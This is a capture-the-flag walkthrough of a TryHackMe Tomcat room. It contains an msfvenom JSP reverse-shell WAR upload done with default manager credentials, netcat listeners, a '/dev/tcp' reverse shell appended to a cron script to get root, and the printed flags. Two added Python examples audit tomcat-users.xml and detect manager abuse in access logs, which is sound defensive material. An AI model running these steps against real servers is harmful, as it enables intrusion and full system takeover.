Room link : https://tryhackme.com/r/room/bsidesgtthompson
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.130.169
FINDING
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 8.5.5
NOTE
HTTP (Apache Tomcat 8.5.5) is running on port 8080
---------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.130.169:8080/
FINDING
+ http://10.10.130.169:8080/docs (CODE:302|SIZE:0)
+ http://10.10.130.169:8080/examples (CODE:302|SIZE:0)
+ http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.130.169:8080/manager (CODE:302|SIZE:0)
---------------------------------------------------------------------------------------------------------
STEP3
http://10.10.130.169:8080/
NOTE
browse to http://10.10.130.169:8080/host-manager
you will get a basic-auth login popup
cancel it and the 401 error page shows the user id and password
<user username="tomcat" password="s3cret" roles="admin-gui"/>
---------------------------------------------------------------------------------------------------------
STEP4
browse to http://10.10.130.169:8080/host-manager
enter the user id and password -- username="tomcat" password="s3cret"
FINDING
http://10.10.130.169:8080/manager/html
NOTE
upload the reverse-shell .war through the manager's "WAR file to deploy" form and click Deploy
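The credentials in STEP3 and STEP4 are the sample ones Tomcat's own 401 page prints, and they worked because the sample account had actually been enabled with manager/host-manager roles. The following is an added example (not from this writeup and not Tomcat code) that audits a tomcat-users.xml for exactly that kind of mistake: privileged accounts using a well-known default password, privileged passwords stored in plain text, and one account holding both manager-gui and manager-script. The KNOWN_DEFAULTS list, the sample XML and the digest-format heuristic are constructed assumptions for the example.

```python
"""Audit tomcat-users.xml for weak manager/host-manager accounts (added example)."""
import xml.etree.ElementTree as ET
from typing import List

# Roles that grant access to the manager or host-manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed short list of default pairs; tomcat/s3cret is the pair Tomcat's
# sample 401 page prints and the one this room left enabled.
KNOWN_DEFAULTS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}

HEX = set("0123456789abcdefABCDEF")


def looks_digested(password: str) -> bool:
    """Heuristic (assumption): Tomcat's MessageDigestCredentialHandler stores
    either a bare hex digest or 'salt$iterations$digest'.  Anything else is
    treated as a plain-text password."""
    if password.count("$") == 2:
        _salt, iterations, digest = password.split("$")
        return iterations.isdigit() and bool(digest) and set(digest) <= HEX
    return len(password) >= 32 and set(password) <= HEX


def audit_tomcat_users(xml_text: str) -> List[str]:
    """Return one finding string per weakness found in the <user> elements."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        # Strip any namespace so both old and new tomcat-users.xml layouts work.
        if el.tag.split("}")[-1] != "user":
            continue
        name = el.get("username") or el.get("name", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # unprivileged accounts are out of scope for this check
        if (name, password) in KNOWN_DEFAULTS:
            findings.append(f"{name}: well-known default password with roles {sorted(privileged)}")
        if not looks_digested(password):
            findings.append(f"{name}: privileged password stored in plain text")
        if {"manager-gui", "manager-script"} <= roles:
            findings.append(f"{name}: holds both manager-gui and manager-script "
                            "(Tomcat's docs advise separate accounts)")
    return findings


# Constructed sample: the first user mirrors this room, the second is a
# digested script-only account, the third is unprivileged.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="f00d$10000$0123456789abcdef0123456789abcdef" roles="manager-script"/>
  <user username="guest" password="guest" roles="guest"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Run it against the real file with `audit_tomcat_users(open("/path/to/conf/tomcat-users.xml").read())`. Pair this with the RemoteAddrValve that recent Tomcat releases ship in the manager's META-INF/context.xml (it allows only loopback clients); STEP4 only works because that restriction was absent or loosened on this box.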
---------------------------------------------------------------------------------------------------------
STEP5
create a .war reverse shell using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.65.196 LPORT=9999 -f war -o rshell.war
upload the file and check that it appears in the application list below
in a new terminal start a listener: nc -nvlp 9999
click on the uploaded reverse-shell application to trigger it and catch the reverse shell
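Every action in STEP4 and STEP5 (hitting the manager from a remote address, a 401 followed by a successful login, the WAR upload, and the first request to the freshly deployed context) lands in Tomcat's access log. The following is an added detection example, not from this writeup, that runs those rules over access-log lines in the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b). The log lines, IP addresses and context name are constructed for the example.

```python
"""Flag the Tomcat manager abuse chain in access-log lines (added example)."""
import re
from typing import List
from urllib.parse import parse_qs, urlparse

# AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
MANAGER_APPS = {"manager", "host-manager"}
# The HTML upload form and the text-interface deploy endpoint.
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}


def is_loopback(host: str) -> bool:
    return host.startswith("127.") or host in ("::1", "0:0:0:0:0:0:0:1")


def context_of(path_only: str) -> str:
    """First path segment, i.e. the web application context ('' for ROOT)."""
    parts = path_only.split("/")
    return parts[1] if len(parts) > 1 else ""


def detect_manager_abuse(lines: List[str]) -> List[str]:
    alerts = []
    remote_flagged = set()   # hosts already reported for non-loopback manager access
    last_status = {}         # host -> status of its previous manager request
    known_contexts = set()   # contexts seen before any deployment
    deploy_seen = False
    for raw in lines:
        m = LOG_RE.match(raw.strip())
        if not m:
            continue  # not in the expected pattern; skip rather than guess
        host, method, path = m["host"], m["method"], m["path"]
        status = int(m["status"])
        path_only = path.split("?", 1)[0]
        ctx = context_of(path_only)
        if ctx in MANAGER_APPS:
            # Shipped manager config allows only loopback; anything else is notable.
            if not is_loopback(host) and host not in remote_flagged:
                remote_flagged.add(host)
                alerts.append(f"{host}: {ctx} app reached from a non-loopback address")
            # A 401 immediately followed by a 200 from the same client: guessed creds.
            if status == 200 and last_status.get(host) == 401:
                alerts.append(f"{host}: manager login succeeded right after a 401")
            last_status[host] = status
            if path_only in DEPLOY_PATHS and method in ("POST", "PUT") and status in (200, 302):
                # /manager/text/deploy names the context in ?path=; the HTML
                # upload carries it in the multipart body, which the log lacks.
                target = parse_qs(urlparse(path).query).get("path", ["<in multipart body>"])[0]
                alerts.append(f"{host}: WAR deployment via {path_only} (context {target})")
                deploy_seen = True
            continue
        # After a deployment, the first hit on a never-before-seen context is
        # most likely the attacker triggering what they just uploaded.
        if deploy_seen and ctx and ctx not in known_contexts:
            alerts.append(f"{host}: first request to new context /{ctx} after a deployment")
        known_contexts.add(ctx)
    return alerts


# Constructed log lines mirroring STEP3 to STEP5 (IPs and timestamps made up).
SAMPLE_LOG = [
    '10.10.1.5 - - [12/Mar/2024:10:00:01 +0000] "GET /docs/ HTTP/1.1" 200 5234',
    '10.10.1.5 - - [12/Mar/2024:10:01:02 +0000] "GET /host-manager/html HTTP/1.1" 401 2473',
    '10.10.1.5 - tomcat [12/Mar/2024:10:01:30 +0000] "GET /manager/html HTTP/1.1" 200 19012',
    '10.10.1.5 - tomcat [12/Mar/2024:10:02:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 302 -',
    '10.10.1.5 - - [12/Mar/2024:10:02:40 +0000] "GET /rshell/ HTTP/1.1" 200 -',
    '127.0.0.1 - admin [12/Mar/2024:10:03:00 +0000] "GET /manager/html HTTP/1.1" 200 19012',
]

if __name__ == "__main__":
    for alert in detect_manager_abuse(SAMPLE_LOG):
        print(alert)
```

The loopback operator in the last line produces no alert, which is the point of keying the rules on client address and on the deploy-then-new-context sequence rather than on manager access alone.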
---------------------------------------------------------------------------------------------------------
STEP6
cd /home/jack
ls -la
cat user.txt
39400c90bc683a41a8935e4719f181bf
---------------------------------------------------------------------------------------------------------
STEP7
cat /etc/crontab
FINDING
cd /home/jack && bash id.sh
---------------------------------------------------------------------------------------------------------
STEP8
echo "bash -i >& /dev/tcp/10.17.65.196/8888 0>&1" >> id.sh
open a listener in a new tab: nc -nvlp 8888
after a few minutes (when the cron job runs) you will get a root shell
---------------------------------------------------------------------------------------------------------
STEP9
in the new root shell
ls -la
cd /root
ls -la
cat root.txt
d89d5391984c0450a95497153ae7ca3a
---------------------------------------------------------------------------------------------------------